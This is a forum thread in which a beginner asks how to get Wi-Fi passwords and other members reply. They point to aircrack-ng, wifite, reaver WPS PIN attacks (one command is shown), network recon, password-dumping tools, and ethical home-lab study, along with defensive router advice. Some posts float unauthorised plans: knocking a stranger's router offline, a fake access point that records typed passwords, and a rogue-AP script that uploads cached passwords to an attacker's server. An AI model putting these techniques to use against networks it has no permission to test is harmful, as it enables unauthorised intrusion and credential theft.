How to get wi-fi passwords

[gabri]

Hello, I'm here because I want to find an answer to a thought I have had about find a Wi-Fi password.

I also want to start saying that I'm new to this "world", what I know comes from passion and hobby, youtube videos and old articles, so forgive me for obvious errors/questions.

What I'm searching for, is a method to find the password of a wi-fi. I've searched a lot on internet, and I've found many methods, like bruteforce attacks, or programs which tries "standard" router passwords, and also methods like -aircrack in Kali Linux. But for me, those methods require a lot of time, or a file in wich you hope to have the password for the attack.

So I was thinking about something different and that's the one I would like to write here to understand if it can work or not with your help.

Let's say the Wi-Fi I want to connect to is called "Alex". What I was thinking about is, first of all, perform an attack in order to get the router down (something like a DOS attack for website). Now, I immediately switch on my phone hotspot (the hope is that someone, previously connected to "Alex", connect to my hotspot, in order to find a solution in internet, since it has no password). At this time, since we are on the same network, enter into his computer, find and download the file which contain all the passwords of the Wi-Fi that computer has connected to (for windows, i think is here c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces[Interface Guid]). Then decrypt and once they reboot the router, connect to "Alex" with the password I've just found.

Does this make any sense to you? Or this has inner problems which make it just an useless thought?

Thank you very much

Gabri

[digip]

1 - How are you on the same network?

2 - How would you access the files?

 

Shutting down their router, doesn't make them automatically connect to your hotspot. You can spoof their AP's SSID, and in hopes have them connect to you, but if they have a stored password expecting an encrypted network, it's not going to spit it out to you, even if you setup with the same encryption on your hotspot. You can leave your hotspot open, for which their client might connect automatically, but not a guarantee. iPhones will probably do it, and older windows, but I don't know if 7 and later will or if Android will. You'd have to test it, which will also answer your questions for above, #1. As for #2, this again requires action on your part to exploit the target system. which means discovering nodes on the network, doing basic recon such as port scanning and service enumeration, sniffing local network traffic to see what kind of info the machines connected are transmitting, and if possible, exploit a possible flaw in any of these services or protocols in use by the connected devices. From there, if you gain access to one of these machines, you'll then need to escalate privileges to get to the files you want like the registry keys holding the wifi info, or on linux/macosx, root to read the files. For iPhone and Android's I'm not even sure where to begin with those, although physical access would be much easier with respect to USB Hid attacks.

 

Hopefully that gets you moving in the direction you'll need to research some of this, but here's the short answer. There is no "quick" way of doing any of this short of an 0-day, which in itself, would require a lot of research and work to figure out. Capturing wifi info and breaking wpa2, is not that hard these days if they have WPS pin access enabled. If not, brute forcing or tools like wifite would be where to start, but still, this gets you onto the same AP you're trying to get passwords for. Attacking the nodes to get the keys will probably be harder without physical access to these machines or same subnet access for exploitation.

 

If you do have access to a windows machine and can dump wifi passwords with tools like http://www.nirsoft.net/utils/wireless_key.html which will pull them for you

[gabri]

First of all, thank you for your answer.

As I expected, there are a lot of things I ignore. I supposed that once connected to the same network and then to one of the machine, you directly have admin priviledges, but I was wrong. As the connection, yes, I was hoping they connect with my network since it don't require a password, but I wasn't considering that maybe they can have another access.

So, you consider this thought too laborious and not that practical, don't you?

And lastly, may I ask you if you can suggest me some materials in order to understand better the aspect of connecting to a computer (the phisical machine), bypassing all the possible obstacles (which I think ar firewall and root access)?

Thanks again for your help!

Gabri

[digip]

Not laborious but something that will take effort. All things worth doing require work and practice to become good at them. Hacking is no different, and practice helps. First off, I'd say get familiar with manual tools like the aircrack suite and hack your home wifi against yourself and machines you own(which is what you should be doing anyway unless hired to attack another persons system). From there, look for automation tools and how they help speed up the process like wifite. When tools don't work, understand why since doing it manually will give you a better understanding of what's going on and why and how to troubleshoot issues. For starters linux or kali in a VM, with a USB wifi card capable of monitor mode will get you started. Youtube, as you mentioned, google and other online resources are a plenty on the topic of wifi hacking and plenty of readable info on the protocols and how they work, their flaws, etc. Once you can capture the 4 way handshake with WPA (WEP can be cracked in a few minutes, since it's a broken protocol, wpa requires brute force or WPS pin code attacks) learn how to use wordlists to brute force the password. Set your wordlist up so that you put your password you know it to be, in the wordlist, just so you can see it work. 

After cracking the wifi password, I'd say move on to tools like nmap, and understand basic networking in general, from arp requests to the different layers of the OSI model to better understand things like MAC addresses being only layer 2, and IP layer 3 and how that works for local LAN vs WAN. Learn how to find machines on the network(nmap will help, but not required. Simple ping sweep will allow you to find nodes with arp, using built in OS tools in windows or linux, and you can script these yourself).

Once you are comfortable finding machines on the network, learn about the various ports and services running on machines, and what may be potential flaws in how machines talk on the network. SMB or Samba for example, if Server, Browser and Workstation services are enabled, are there any file shares or credentials for windows floating around the network. 

These will get you started at least in a direction that will allow you to research the topics in general and learn more by doing, than by copy and paste. Still, using online examples never hurts either, just learn how and why they do what they do in the examples you find. Setting up a home lab is a good idea too. If you only have one main desktop machines, then install VMware or VBox and install some virtual machines to test against locally. Once you are comfortable with setting up the lab and learning host discovery, give places like vulnhub.com a try and see how you can hack into different systems. They offer walkthroughs on almost all of the vulnerable virtual machines as well, which helps if you get stuck and have no idea where to start. I wouldn't jump right into the vulnhub stuff though till you get a good understanding of basic networking fundamentals and use of tools like nmap, netcat / nc / ncat and simple understanding of traffic in tools like wireshark. Will help a ton with a lot of this.

 

Online resources and topics:

what are ports and services

tcp/ip, UDP, and the OSI model

nmap.com

wireshark.com

offsec.com (check out the Metasploit section for learning metasploit)

securitytube and youtube 

vulhub

google, google, google...

Courses if you really want to dig in, CompTIA Network+, A+ and Linux+ for basics, but also a great foundation to build on later. For high level, more experienced users, offsec's PWK is a great course, but not for someone with no knowlege of basic networking and linux fundamentals in general. 

 

Also, these forums have a TON of info and links to various topics. Learn to use the search, and even google dork this site. Example:

https://www.google.com/search?client=opera&q=site%3Aforums.hak5.org&sourceid=opera&ie=UTF-8&oe=UTF-8#q=nmap+site:forums.hak5.org

[0phoi5]

To be blunt, but polite, if you feel that Aircrack-ng "require(s) a lot of time, or a file in which you hope to have the password for the attack", and therefore you are not using it because of this, you have;

1. Not understood Aircrack-ng enough (there are plenty of methods for attacking using Aircrack without a dictionary file), and
2. You need to rethink your career/hobby goals. Hacking/pen testing requires patience and doesn't happen in seconds like in movies, and
3. You're doing it wrong. I can grab a 4 way handshake using Aircrack-ng in a couple of minutes. The time taken to then crack the password then relies upon your GPU power and the strength of the password, both of which will remain a constant regardless of which program you use.

Once you have used, been successful with and understood Aircrack-ng, search for Wifite.sh

Edited September 26, 2016 by haze1434

[gabri]

Hi!

First of all I would like to say thank digip you for your help and precious informations.

As an answer to haze1434, "You are right" is what I would say to your statements. I am sure not to have understood enough Aircrack-ng, because I lack of the basis. I don't know most of the fundaments of a network, or a router, what is the process behind a network connection and so on. I'm trying for the first time to go deeper on the argument and that's the reason I've asked, in my second post, if someone could share links or materials where I could study.

I've seen a few videos of Wifite on youtube too, and I've also tried the program, but I think I have a wifi card which doesn't support injection mode, since I can't move forward (like in aircrack-ng, I can't grab the handshake). Now I'm reading some materials on aircrack-ng.org and things are getting a bit more clear.

Of course, I won't give up.

[Wallruss]

To second the comments by haze1434, patience and desire to learn is critical along with acceptance of an extremely high failure rate if you want to be in this field as a career or hobby.  Learning from the multitude of failed attempts is what helps us succeed.  And I always roll my eyes when I see a 'hacker' in the movies magically do things in seconds - lol.  Read a lot, play a lot and don't give up.  Welcome to a fascinating world!!

[gabri]

Hello!

I resume this post in order to ask you for another information:

I've finally bought a decent wifi card and I also studied a lot in those past days, but I've got a problem "on the field".

I achieve to get the handshake with airodump-ng, but then I'm not able to do anything. I'll explain better.

Once I get the handshake, I want to crack the wpa, but not with the wordlist method, since I am 100% sure that the pwd is not in the files I have. So I tried reaver, but it gives me this error "WPS pin not found!" (using Pixiewps). I've also tried wifite, but it give me the same result too.

I don't understand what I did wrong, but i'm also 100% sure the problem is mine, since it happens also on other networks (not all networks, I could get into two).

I write the command below, just to show you what I did

reaver -i wlan1mon -b (bssid) -vv -K 1

P.S. I've tried both with airodump-ng wlan1mon and with wash -i wlan1mon, so I don't think is a problem of wps compatibility.

Thank you

G.

[digip]

WPS Pin attacks are not the same as a bruteforce attack. if you know the password(which you should if its your router you're testing against) put a few words plus the password in any text file, each word on a line by themselves.

as for WPS Pin attacks, the router has to have WPS enabled to work.

From the sounds of it, this isn't your router, and we don't condone attacking devices you don't own. You're on your own from here.

 

 

[gabri]

Hi,

thank for all the informations!

Yes, the router is not mine. The owner is a friend of mine and we are both into understanding how this works. So, I asked him if I could use his router and he could do the same with mine. He agreed, so I think there is no problem.

At first, I've used my router, but I've found the password with reaver in less than 1 second (13 digits, with capital letters, numbers and lowercase letters). I don't know if this happened because the password was stored inside the network manager or for another reason, but this brought me to ask my friend for use his router (and I specifically requested him not to tell me the password). For this reason I asked here for help, because I don't know how to solve this problem.

Yesterday I have also used "bully", but it was a real long process and I had to stop it. I've read that someone say it's better than reaver, others says reaver has more options and is more reliable.

[Wallruss]

Glad to hear you are taking the ethical road!  Ultimately what it comes down to is time and education.  In order to truly know which tools work the best, you need to invest time (and it will take a lot of it).  By really educating yourself on the benefits and drawbacks of each tool, you will always come out the winner.  Why?  Because every situation is different, and a well educated hacker will know which tools serve him/her best for that situation.  Keep in mind that this field is one where you must be very tolerant of a very high failure rate - that's all part of the education process.  Lots of patience and only changing one variable at a time.  Trust me, it really pays off big time.  If you're looking for a quick fix and win, then this is the wrong area of interest - lol.  So dig in and find out for yourself about each option and why some folks like one tool over another.  The best opinion is your own, because you'll always find someone else with theirs and all too willing to share.  Stick with it an you will be one of the folks advising others one day!

[digip]

On a side note, if you found your password quickly for your own router using WPS Pin code attacks such as reaver or wifite, disable it on your router. One of the reasons for assessing and testing with your own equipment, is not just to learn how to attack, but also learn how to defend and secure the device. If you can crack it in seconds, so can the rest of the world and your network is open to attack. 

[0phoi5]

11 hours ago, digip said:

One of the reasons for assessing and testing with your own equipment, is not just to learn how to attack, but also learn how to defend and secure the device. If you can crack it in seconds, so can the rest of the world and your network is open to attack. 

On a funny side note, my father-in-law recently gave me the password for his NETGEAR router, which was something like 20 digits. Because of this, he thought it was secure (and you probably would too).

The problem was, I explained, that NETGEAR routers use a default password of an adjective, a noun and a few numbers. Which is what he was using.

Not sounding so secure now, right? I reckon that'd take less than an hour to crack.

I've advised him to change it.

[gabri]

That's the first thing I've done when I bought my router: change password with one, non standard, which was difficult to find..well, one I thought was difficult to find. But I was completely wrong ahah

I've also another router, in which I can set if I want a wpa or wpa2 password. In this case the default is a wps, but when I try to change the settings and chose wpa2, all the devices can't connect, showing an error of connection. Do you think is a big difference in protection or it is ok to keep the router with wpa?

Another question is about the encryption: I can see that some routers still use TKIP and others CCMP. I know that some programs have problems to work with the first one (like reaver). But this doesn't mean that is more secure, right? For what I've understood, CCMP is about wpa2 and TKIP for wpa, so is not about security but compatibility, right?

[0phoi5]

2 hours ago, gabri said:

Do you think is a big difference in protection or it is ok to keep the router with wpa?

Another question is about the encryption: I can see that some routers still use TKIP and others CCMP. I know that some programs have problems to work with the first one (like reaver). But this doesn't mean that is more secure, right? For what I've understood, CCMP is about wpa2 and TKIP for wpa, so is not about security but compatibility, right?

Use WPA2 where you can. More secure. Attackers pretty much have to rely on capturing a handshake and cracking your password, meaning a decent password makes it almost(?!) impossible to break.

Never use WPS. Easy to break in to in minutes. Don't even need to capture a handshake.

[digip]

Some devices can't do WPA2, and may have to use WPA. This is usually a driver issue, such as an older XP workstation, might need new wireless drivers or just a new card(My sisters laptop can't do 802.11 N, 5Ghz or WPA2, only A, B and G over 2.4ghz with WPA as the max, due to the age of the laptop and internal wireless card - she could however use an external USB card to get onto WPA2 though)

 

If the other devices you own can't connect, make sure you manually set them up and connect them using the proper password and WPA2 settings. Nothing will automatically reconnect on its own once you change it over to WPA2 without WPS. You may have to tell it to forget the old AP settings and rescan for the SSID, but set it up manually would be required for all devices that were on the AP before once you disable WPS.

[gabri]

Wow thank you very much for the support!! Actually I didn't thought it could be a problem of my wireless card! But I remember that my phone couldn't see the network too.. Tomorrow I have to try again and find a solution, maybe buying a new router..

I have another question. I've just tried to use the "fake AP" method on my own network, but I have a problem: when I connect to the fakeAP and then I open the browser, it does not redirect me to the "fake router page". I have to insert manually the router address to find the fakeAP page. Do you know a way to avoid this?

Linked to the previous question, I would like to ask you if there is a way to set the fake AP so that it records everything I type into the "fake router" page. I mean, now if I type the wrong pwd, it says that the pwd is wrong and I have to re-enter the password until I type the correct one. I just want to know if there is a way to register and send to the kali terminal everything I write, but giving the same result ("wrong" if password is not the good one, "loading" if the password is correct).

Thanks again!

[watsee]

Funnily enough, myself and a colleague were just talking about something like this. However what we posed was that;

 

Suppose you spoof an AP & de-authenticate clients, relying on them to re-authenticate and connect to your MITM device. A Pineapple perhaps or Kali-powered machine. Would it not be a possibility to create a phishing type page to redirect them to, Google for example, which also deploys a self-executing script (a la rubber ducky) to pull out these cached passwords & upload them to your device or external web server - before removing the script. 

 

Of course there will be the reliance on the gullibility of PC users to accept any UAC prompts etc which may arise.

 

I'm a relative newbie, but long-term aim is to become very educated in this field (having a great interest in this) so please forgive any general ignorance I might have to any security or technical limitations.